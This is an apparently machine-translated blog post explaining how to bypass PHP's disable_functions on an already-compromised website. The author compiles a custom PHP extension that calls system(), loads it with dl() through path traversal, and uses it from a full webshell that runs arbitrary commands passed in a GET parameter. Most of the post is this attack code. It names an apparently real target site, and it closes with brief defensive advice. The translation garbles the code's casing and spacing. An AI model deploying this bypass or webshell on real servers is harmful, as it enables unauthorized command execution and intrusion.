Use the PHP extension module to break through Disable_functions to execute commands

Netxfly s Blog

I went to work on the last day of yesterday. I had to leave the office and prepare to return all the company's assets (one x61, Token and desktop ), the desktop has gone offline (clear all the hard disk content except the system disk, and Ghost restores the system disk). When sorting out the hard disk documentation, find a paper written in August 29, 2007 and paste it out, this method may be out of date :)

Preface
Php is a powerful and widely used scripting language. Many websites on the Internet use the php architecture. The system, exec, passthru, shell_exec, and proc_open functions provided by php can be used to directly execute system commands, posing a great threat to server security. Therefore, the Administrator is generally configuring php. in ini, The disable_functions option is used to prohibit the use of the above dangerous functions, which brings a lot of trouble to our penetration test.
The dl () function allows the php module to be dynamically loaded in the php script. The enable_dl option is enabled by default, and the Administrator usually ignores this option, in this way, we have the opportunity to load our own php expansion module to execute system commands. The extension_dir option can specify the directory of the module, but it can be exceeded through the correct path.
The test platform is Red hat Linux 9 + Apache 2.0.59 + php4.4.7.

Body
Suppose we get the WebShell of the target site, but the disable_functions option limits the execution of the system, exec, passthru, shell_exec, proc_open functions, so we cannot execute the Local Root exploits to improve the permission.
WebShell address: http://www.69ngo.com/include/cmd_class.php? Cmd = info
By viewing the phpinfo information, the execution of system, exec, passthru, shell_exec,
Proc_open function, enable_dl = on, safe_mode = off, as shown in:


Compile the php extension module
The php version of the target site is 4.4.4, apache is 2.0.52, the version is old, the official only provide the lowest version of php and apache versions are php-4.4.7 and httpd-2.0.59. The pen uses php-4.4.7.

1. Create a php extension module
There is an ext_skel under the ext directory of Php, which can generate a php extension module template to facilitate programmers to compile the php extension module.
Tar-zxvf php-4.4.7.tar.gz
Cd php-4.4.7/ext/
./Ext_skel-extname = security

Create an extension module named security. It prompts you how to write the php module, as shown in the figure below:


After the preceding command is executed, a directory with the same name as the module name is created under the ext directory, and the files required to create the php module are automatically generated, as shown in:

2. configuration project
Config. m4 is the configuration file of the extension module. The file content is roughly as follows:

Dnl If your extension references something external, use:



Dnl PHP_ARG_WITH (security, for security support, dnl Make sure that the comment is aligned:
Dnl [-- with-security Include security support])



Dnl Otherwise use enable:



Dnl PHP_ARG_ENABLE (security, whether to enable security support, dnl Make sure that the comment is aligned:
Dnl [-- enable-security Enable security support])

Dnl is the annotator. If we want to compile the php extension module into php, we will remove the comments before the PHP_ARG_ENABLE compilation option. We want to compile it in with mode. so module, so remove the comment before the PHP_ARG_WITH option, and finally modify it, as shown in:


3. write code
The template code is in Security. c. We can add our own code to this template.

/* {Security_functions []

*

* Every user visible function must have an entry in security_functions [].

*/

Zend_function_entry security_functions [] = {PHP_FE (confirm_security_compiled, NULL)/* For testing,
Remove later .*/

{NULL, NULL, NULL}/* Must be the last line in security_functions []

*/

};

/*}}}*/
The above is the entry function of the php module. If I want to create a new netxfly function

Change PHP_FE (confirm_security_compiled, NULL) to PHP_FE (netxfly, NULL)
As shown in:


The Function Format of the Php module is PHP_FUNCTION (function name). Change the confirm_security_compiled example function to netxfly, and then call the system () function to execute the command.

PHP_FUNCTION (netxfly)

{

Char * arg = NULL;

Int arg_len, len;

Char string [256];



If (zend_parse_parameters (ZEND_NUM_ARGS () TSRMLS_CC, "s ",

& Arg, & arg_len) = FAILURE ){

Return;

}
System (arg );

}

Then declare the netxfly function in php_security.h. The Code is as follows:

PHP_FUNCTION (netxfly);/* my edevil function */

4. Compile the extension module
Cd ../../

Rm -- fr configure

./Buildconf -- force

./Configure -- with-security = shared

Make

Make install

If no problem occurs, security. a and security. so are compiled under the php-4.4.7/modules. Security. a is imported to the database, and security. so is the php extension module we wrote, as shown in:


5. Test in local test environment

Write a test. php file. If the function is successfully executed, a tmp.txt file will be generated in the worker. As shown in:


6. Release to "production environment"

The target site's extension_dir =/usr/lib/php4, SCRIPT_FILENAME =/pub/vhosts/69ngo/www.69ngo.com/include/pai_class is learned from phpinfo. php. so is uploaded to the same directory of pai_class.php, so the security is dynamically loaded using webshell. so path: dl (".. /.. /.. /pub/vhosts/69ngo/www.69ngo.com/include/security.so ");

Write a simple WebShell:

<? Php

If ($ _ GET [cmd]! = "")

{

If (! Strcmp ($ _ GET [cmd], "info "))

{

Phpinfo ();

}

Else

{

Dl (".../pub/vhosts/69ngo/www.69ngo.com/#de/security.so ");

$ Command = $ _ GET [cmd]. "> tmp.txt ";

Netxfly ($ command );

Echo file_get_contents(tmp.txt );

Echo "<br> The Command Completed Successful! ";

}

}

Else

{

Echo "Error ,;)";

}

?>



Upload the webshell to the "production environment" (target host) And you can call the netxfly () function in the security. so module to execute system commands, as shown in:

Defense method:
1. Safe_mode = on. Do not use the dl () function to load external modules.
2. Add dl () to the disable_functions Option List.

References:
Http://www.xfocus.net/articles/200704/915.html http://www.toplee.com/blog/archives/56.html http://jason.rocklv.net/techdoc/PHPExt.html